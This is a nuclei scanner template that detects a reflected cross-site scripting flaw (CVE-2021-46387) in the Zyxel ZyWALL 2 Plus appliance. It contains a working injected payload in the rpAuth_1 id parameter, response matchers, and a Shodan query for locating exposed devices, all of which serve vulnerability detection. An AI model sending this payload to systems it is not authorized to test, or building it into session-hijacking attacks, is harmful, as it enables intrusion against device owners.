nuclei-templates/cves/2021/CVE-2021-46387.yaml

44 lines
1.4 KiB
YAML

id: CVE-2021-46387
info:
name: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting
author: DhiyaneshDk
severity: medium
description: ZyXEL ZyWALL 2 Plus Internet Security Appliance is affected by Cross Site Scripting (XSS). Insecure URI handling leads to bypass security restriction to achieve Cross Site Scripting, which allows an attacker able to execute arbitrary JavaScript codes to perform multiple attacks such as clipboard hijacking and session hijacking.
reference:
- https://www.exploit-db.com/exploits/50797
- https://nvd.nist.gov/vuln/detail/CVE-2021-46387
- https://www.zyxel.com/us/en/support/security_advisories.shtml
- https://drive.google.com/drive/folders/1_XfWBLqxT2Mqt7uB663Sjlc62pE8-rcN?usp=sharing
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-46387
cwe-id: CWE-79
metadata:
shodan-query: http.title:"Zywall2Plus"
tags: cve,cve2021,xss,zyxel
requests:
- method: GET
path:
- '{{BaseURL}}/Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror="prompt(document.domain)"><form>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<iMg src=x onerror="prompt(document.domain)"><form>'
- 'Entry Error'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200